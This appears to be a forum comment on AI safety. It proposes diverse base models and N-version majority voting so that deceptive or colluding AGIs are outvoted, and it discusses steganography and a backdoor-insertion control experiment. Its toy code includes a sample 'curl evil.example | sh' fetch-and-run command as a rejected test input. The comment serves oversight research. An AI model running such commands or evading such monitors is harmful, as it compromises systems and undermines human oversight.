I’d be significantly more optimistic if I thought that humans would have access to many AGIs, some unable to betray. (well more specifically: some genuinely always honest and helpful even about stuff like AGI takeover) Instead I think that the cohort of most-powerful-AGIs-in-the-world will at some point be entirely misaligned & adversarial. (After all, they’ll probably all be copies of the same AGI, or at least fine-tunes of the same base model)
Daniel, you proposed in a dialogue a large number of ultrafast AGIs serving as AI researchers.
If you think about it, each underlying AI model you are trying to improve is a coordinate in the possibility space of all models, and you then have your researcher AGIs attempt to find an improvement from that starting point.
This search will get stuck at local optima. To improve your odds of finding the strongest model that current compute can support, you would want to run this RSI search from a diverse league of many starting locations. I can draw you a plot if it helps; a toy sketch of the idea is below.
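Here is a minimal Python sketch of that point (the fitness landscape, step sizes, and number of starts are all made up for illustration; they just stand in for "model quality as a function of position in model space"): greedy improvement from one start tends to stall on a local peak, while the same search run from many diverse starts usually lands on a better one.

```python
import math
import random

def fitness(x):
    # Toy multi-peaked landscape standing in for "model quality as a
    # function of position in the space of all models." Illustrative only.
    return math.sin(3 * x) + 0.5 * math.sin(7 * x) - 0.02 * (x - 5) ** 2

def hill_climb(x, steps=200, step_size=0.05):
    # Greedy local search: accept a random perturbation only if it improves fitness.
    best_x, best_f = x, fitness(x)
    for _ in range(steps):
        cand = best_x + random.uniform(-step_size, step_size)
        f = fitness(cand)
        if f > best_f:
            best_x, best_f = cand, f
    return best_x, best_f

random.seed(0)

# One starting point: every researcher AGI refines copies of the same base model.
single = hill_climb(0.0)

# A diverse league of starting points: many distinct base models/architectures.
starts = [random.uniform(-10.0, 10.0) for _ in range(20)]
multi = max((hill_climb(s) for s in starts), key=lambda r: r[1])

print(f"single start      -> best fitness {single[1]:.3f}")
print(f"20 diverse starts -> best fitness {multi[1]:.3f}")
```

The analogy is starting RSI from several genuinely different base models rather than from fine-tunes of one.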
The historical equivalent is how the Manhattan Project invested in and optimized three entire pipelines to obtain fissionables (calutrons, gaseous diffusion, and plutonium production reactors). The reason was that they didn't know how far each pipeline would scale when optimized; it was possible that any one effort could hit a wall. For AI, we don't know how far LLMs will scale, or variants that use an entirely different underlying network architecture, or sparse spiking networks, etc. It is possible that any popular method will saturate at greater scales.
One of the benefits of using AGI to advance AI is that there are humans who have invested their entire careers solely in mastering transformers. When transformers become obsolete, those humans will have difficulty shifting to the new best method, whereas an AGI can be fine-tuned on all the information that exists about the new method in a week.
Completely diverse models that use a different underlying method are probably less able to collude with each other or communicate via steganography if they have no shared context.
You could use the resulting diverse AGI-grade models in a polyglot redundant system architecture (N-version programming). I have read of this but don't believe humans have ever been able to afford to implement it. This is where you write an avionics or other life-safety application several times, on different software stacks (different OS, different language). The versions run in lockstep on separate hardware, and the majority output goes to the control actuators.
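As a rough sketch of what the voting layer looks like (the channel functions, command strings, and 2-of-3 threshold are placeholders, not any real avionics standard): three independently built channels each compute a command, and only the majority result reaches the actuators.

```python
from collections import Counter

def majority_vote(outputs, fallback="SAFE_STOP"):
    # Return the command agreed on by at least two of the three channels;
    # if there is no majority, fall back to a safe state.
    value, count = Counter(outputs).most_common(1)[0]
    return value if count >= 2 else fallback

# Placeholder channels standing in for three diverse stacks
# (different base model, different architecture, different vendor/OS).
def channel_a(sensors): return "EXTEND_ARM"
def channel_b(sensors): return "EXTEND_ARM"
def channel_c(sensors): return "RETRACT_ARM"  # a faulty or deceptive channel

sensors = {"proximity_cm": 42}
command = majority_vote([channel_a(sensors), channel_b(sensors), channel_c(sensors)])
print(command)  # EXTEND_ARM: the lone defecting channel is outvoted
```

A single compromised or deceptive channel cannot move the actuators by itself; it would need the other, architecturally unrelated channels to defect in the same way at the same moment.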
For AI-driven robotics, this would probably be immune to most adversarial inputs, among other advantages, and it makes deception and betrayal very difficult to pull off at all. For some applications, paying for triple the hardware and triple the AI license fees might be worth the increased reliability. This is also a simple measure humans could take if it turns out that deceptive AIs are an actual problem. I am sure you saw the paper where someone tried this with GPT-3.5 and GPT-4 for a mock 'insert a backdoor' task. Using Gemini would add more diversity, and using some non-LLM method to analyze code specifically for backdoors would likely be even better.
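The code-review version of the same idea, as a sketch with entirely hypothetical reviewer functions (none of these wrap a real API; each would call a genuinely different system, e.g. a GPT-family model, a Gemini-family model, and a non-LLM static analyzer): a patch only ships if every independent reviewer clears it.

```python
def gpt_family_review(diff: str) -> bool:
    # Placeholder: would ask one LLM vendor's model whether the diff
    # inserts a backdoor or deviates from the stated task.
    return "os.system(" not in diff  # stand-in heuristic for illustration

def gemini_family_review(diff: str) -> bool:
    # Placeholder: a second, architecturally unrelated model asked the same question.
    return "eval(" not in diff

def static_analyzer_review(diff: str) -> bool:
    # Placeholder: a non-LLM check, e.g. a taint/dataflow or allowlist scanner.
    return "import socket" not in diff

def approve_patch(diff: str) -> bool:
    # Unanimous approval required: a backdoor has to fool reviewers that
    # share neither weights, training data, nor architecture.
    reviewers = (gpt_family_review, gemini_family_review, static_analyzer_review)
    return all(reviewer(diff) for reviewer in reviewers)

print(approve_patch("def add(a, b):\n    return a + b"))                # True
print(approve_patch("import os\nos.system('curl evil.example | sh')"))  # False
```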